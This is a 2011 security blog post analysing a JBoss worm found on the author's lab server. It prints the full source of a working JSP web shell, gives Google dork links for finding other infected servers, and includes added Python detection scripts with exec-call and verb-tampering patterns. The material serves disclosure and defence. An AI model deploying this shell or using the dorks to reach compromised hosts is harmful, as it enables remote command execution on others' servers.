Goats Uncovered


Jboss Worm – It is real and there are 3 new forms spreading #in #jboss #worm

During the last two weeks I exposed my lab to a public IP. I have JBoss 4/6 on it, plus some other things, and today I noticed something I didn't deploy:

Directory of C:\jboss\server\default\deploy\management
../../2011 11:41 <DIR> .
../../2011 11:41 <DIR> ..
../../2010 04:10 <DIR> console-mgr.sar
../../2011 20:29 <DIR> iddqd.war
../../2011 23:09 <DIR> idssvc.war
../../2011 18:55 <DIR> iesvc.war
../../2010 04:26 <DIR> web-console.war
../../2011 22:22 <DIR> wstats.war
../../2011 19:07 <DIR> zecmd.war

This is a default JBoss directory, where you should find only web-console.war and console-mgr.sar; as you can see, someone has added something else. This server had a (strong) password, so I think they used a 0day or the JBoss HTTP verb vuln (HEAD access to the jmx-console). Starting from the first one, iddqd.war: it is a simple war with only one JSP, of the very same name:

Directory of C:\jboss\server\default\deploy\management\iddqd.war
../../2011 20:29 <DIR> .
../../2011 20:29 <DIR> ..
../../2011 16:44 630 iddqd.jsp
1 File(s) 630 bytes

iddqd.jsp is a simple Java web shell (x.x.x.22 is my server):

[Screenshot: iddqd.jsp running net statistics]

Here is the source; it is a very straightforward JSP shell:

<%@ page import="java.util.*,java.io.*"%>
<HTML><BODY>
<FORM METHOD="GET" NAME="comments" ACTION="">
  <INPUT TYPE="text" NAME="comment"> <INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%-- whatever arrives in ?comment= is passed to the OS unchanged and its stdout is echoed back --%>
<% if (request.getParameter("comment") != null) {
     out.println("Command: " + request.getParameter("comment") + "<BR>");
     Process p = Runtime.getRuntime().exec(request.getParameter("comment"));
     OutputStream os = p.getOutputStream();
     InputStream in = p.getInputStream();
     DataInputStream dis = new DataInputStream(in);
     String disr = dis.readLine();
     while ( disr != null ) { out.println(disr); disr = dis.readLine(); }
   } %>
</pre>
</BODY></HTML>

All the wars are built the same way: there is an xxx directory (where xxx is the name of the war, e.g. zecmd) containing its corresponding JSP (zecmd.jsp), so on my server there are now 5 Java backdoors:

http://x.x.x.22/zecmd/zecmd.jsp

http://x.x.x.22/wstats/wstats.jsp

http://x.x.x.22/iddqd/iddqd.jsp

http://x.x.x.22/idssvc/idssvc.jsp

http://x.x.x.22/iesvc/iesvc.jsp
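The layout above (a stray exploded .war in a directory that should hold only stock JBoss components, each one wrapping a single JSP that calls Runtime.exec on a request parameter) is easy to check for mechanically. The triage script below is an added example, not code from the original post: it walks a JBoss deploy directory, reports any entry not in an allowlist of expected deployments, and flags JSPs whose source spawns a process from user input. The sample directory tree it builds with tempfile is constructed to mirror the listing in the post; the allowlist, indicator patterns and function names are my own assumptions, not anything JBoss ships.

```python
import os
import re
import tempfile

# Stock contents of server/default/deploy/management on JBoss 4.x, per the
# listing above. Anything else in that directory was put there by someone.
EXPECTED_MANAGEMENT = {"console-mgr.sar", "web-console.war"}

# Source-level indicators of a JSP command shell. iddqd.jsp matches the first
# pattern plus the user-input check; ProcessBuilder covers a common variant.
EXEC_PATTERNS = [
    re.compile(r"Runtime\.getRuntime\(\)\s*\.exec\s*\("),
    re.compile(r"new\s+ProcessBuilder\s*\("),
]
USER_INPUT = re.compile(r"request\.getParameter\s*\(")

# Shell source as posted above (iddqd.jsp); reused here as constructed sample data.
IDDQD_JSP = '''<%@ page import="java.util.*,java.io.*"%>
<HTML><BODY>
<FORM METHOD="GET" NAME="comments" ACTION="">
<INPUT TYPE="text" NAME="comment"> <INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<% if (request.getParameter("comment") != null) {
    out.println("Command: " + request.getParameter("comment") + "<BR>");
    Process p = Runtime.getRuntime().exec(request.getParameter("comment"));
    DataInputStream dis = new DataInputStream(p.getInputStream());
    String disr = dis.readLine();
    while ( disr != null ) { out.println(disr); disr = dis.readLine(); }
} %>
</pre></BODY></HTML>
'''

# A harmless JSP that reads a parameter but never executes anything (constructed).
BENIGN_JSP = '''<%@ page import="java.util.*"%>
<html><body>
<% String user = request.getParameter("user");
   out.println("Hello " + (user == null ? "guest" : user)); %>
</body></html>
'''


def scan_jsp(path):
    """Return the indicator names found in one JSP; an empty list means it looks clean."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    hits = [p.pattern for p in EXEC_PATTERNS if p.search(src)]
    # Only worth noting when a process is spawned: getParameter alone is normal.
    if hits and USER_INPUT.search(src):
        hits.append("user-controlled input")
    return hits


def triage_deploy_dir(deploy_dir, expected=EXPECTED_MANAGEMENT):
    """Report unexpected deployments and process-spawning JSPs under deploy_dir.

    Returns {"unexpected": [names], "suspect_jsp": {relative path: [indicators]}}.
    """
    findings = {"unexpected": [], "suspect_jsp": {}}
    for name in sorted(os.listdir(deploy_dir)):
        full = os.path.join(deploy_dir, name)
        if name not in expected:
            findings["unexpected"].append(name)
        if not os.path.isdir(full):
            continue  # packed .war files would need zipfile; exploded ones are walked here
        for root, _dirs, files in os.walk(full):
            for fname in files:
                if not fname.lower().endswith((".jsp", ".jspx")):
                    continue
                path = os.path.join(root, fname)
                hits = scan_jsp(path)
                if hits:
                    rel = os.path.relpath(path, deploy_dir).replace(os.sep, "/")
                    findings["suspect_jsp"][rel] = hits
    return findings


def build_sample_tree():
    """Constructed replica of the infected management directory (sample data, not real files)."""
    base = tempfile.mkdtemp(prefix="jboss-mgmt-")
    layout = {
        "console-mgr.sar": {},
        "web-console.war": {"index.jsp": BENIGN_JSP},
        "iddqd.war": {"iddqd.jsp": IDDQD_JSP},
        "zecmd.war": {"zecmd.jsp": IDDQD_JSP},
    }
    for archive, files in layout.items():
        d = os.path.join(base, archive)
        os.makedirs(d)
        for fname, body in files.items():
            with open(os.path.join(d, fname), "w", encoding="utf-8") as fh:
                fh.write(body)
    return base


if __name__ == "__main__":
    result = triage_deploy_dir(build_sample_tree())
    for name in result["unexpected"]:
        print("unexpected deployment:", name)
    for path, hits in result["suspect_jsp"].items():
        print("suspect JSP:", path, "->", ", ".join(hits))
```

Point it at a real deploy directory with an allowlist built from a known-clean install of the same JBoss version; the web-console JSP in the sample shows that reading a request parameter by itself does not trip the check, only spawning a process does.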

After discovering this, I started to wonder: why would you need to upload 5 webshells? If you are a "human", you would surely prefer one stable webshell. This is where I googled for iddqd.jsp, and here comes the surprise: everything seems to link this JSP to the infamous, and not well known (to me), JBoss worm. Here is a great and detailed analysis I found, and I can confirm this is the behavior when the infection is successful:

http://eromang.zataz.com/2011/10/25/jboss-worm-analysis-in-details/


Just try googling for iddqd.jsp / wstats.jsp (the last one is less common) and you'll find a third form, zmeu/zmeu.jsp.

I found no references explicitly linking the JBoss worm to wstats.jsp, zmeu.jsp and iddqd.jsp, so I assume those are 3 new "forms" of this "worm".

Dorking for those JSP names can give you an idea of how many sites have this worm/shell on them!

You can even find the issued commands (perl+a.pl or pscan) in the status history:

http://www.google.com/search?q=zmeu.jsp

http://www.google.com/search?q=iddqd.jsp

http://www.google.com/search?q=%22wstats.jsp%22

http://www.google.com/search?q=%22iesvc.jsp%22

http://www.google.com/search?q=%22zecmd.jsp%22

http://www.google.com/search?q=%22idssvc.jsp%22
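The same names that make the shells googleable also make them easy to spot in your own access logs, and since every one of them takes its command in the ?comment= query parameter, the log also tells you what the operator ran. The script below is an added example, not code from the original post: it parses combined-format access log lines, flags requests to the /<name>/<name>.jsp paths listed above and decodes the issued command, and separately flags requests that reach the jmx-console with a method other than GET or POST, which is the verb-tampering entry vector the post suspects. The log lines, client addresses and timestamps are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Shell names seen in the post (and in the Google results it links to).
SHELL_NAMES = ("zecmd", "wstats", "iddqd", "idssvc", "iesvc", "zmeu")
# Every one of these wars exposes itself as /<name>/<name>.jsp.
SHELL_PATH = re.compile(r"^/(%s)/\1\.jsp$" % "|".join(SHELL_NAMES))
JMX_CONSOLE = re.compile(r"^/jmx-console(/|$)")

# Apache/Tomcat "combined" style line: client, identd, user, [time] "METHOD target proto" status
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log (assumed format and values; not from the author's server).
SAMPLE_LOG = """\
203.0.113.7 - - [15/Dec/2011:22:22:41 +0100] "HEAD /jmx-console/HtmlAdaptor HTTP/1.1" 200 -
203.0.113.7 - - [15/Dec/2011:22:23:02 +0100] "GET /wstats/wstats.jsp?comment=perl+a.pl HTTP/1.1" 200 512
198.51.100.23 - - [15/Dec/2011:23:10:15 +0100] "GET /iddqd/iddqd.jsp?comment=pscan+10.0.0+22 HTTP/1.1" 200 1024
192.0.2.5 - - [16/Dec/2011:09:01:00 +0100] "GET /web-console/ HTTP/1.1" 200 2048
192.0.2.5 - - [16/Dec/2011:09:01:05 +0100] "GET /idssvc/idssvc.jsp HTTP/1.1" 200 331
"""


def find_webshell_requests(lines):
    """Return one dict per suspicious request, in log order.

    rule "webshell": a hit on one of the known shell paths; "command" holds the
    decoded ?comment= value, or None when the shell page was only loaded.
    rule "jmx-console verb": jmx-console reached with a method other than GET/POST.
    """
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a line in the expected format; skip rather than guess
        client, when, method, target, status = m.groups()
        parts = urlsplit(target)
        record = {"client": client, "time": when, "method": method,
                  "path": parts.path, "status": int(status)}
        if SHELL_PATH.match(parts.path):
            # parse_qs already turns '+' into spaces and decodes %xx escapes
            cmd = parse_qs(parts.query).get("comment", [None])[0]
            hits.append(dict(record, rule="webshell", command=cmd))
        elif JMX_CONSOLE.match(parts.path) and method.upper() not in ("GET", "POST"):
            hits.append(dict(record, rule="jmx-console verb", command=None))
    return hits


if __name__ == "__main__":
    for h in find_webshell_requests(SAMPLE_LOG.splitlines()):
        print(h["time"], h["client"], h["rule"], h["method"], h["path"], h["command"])
```

The jmx-console rule is deliberately broad (any non-GET/POST method, whatever the status code): on a stock JBoss 4 install the console's security constraint only covers GET and POST, so a HEAD that returns 200 where a GET would return 401 is exactly what to look for around the time the first .war appeared.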

There are at least 200 unique URLs indexed by Google that seem to be infected (my lab isn't indexed, and I suppose many infected JBoss servers aren't either).

It is spreading right now (e.g. in my lab wstats.jsp was uploaded yesterday, 15 Dec); while it is not as serious as other worms, it can target critical applications and infrastructure, because usually nobody uses JBoss for a "simple company site".

December 16, 2011 | Tags: backdoor, info, jboss, worm
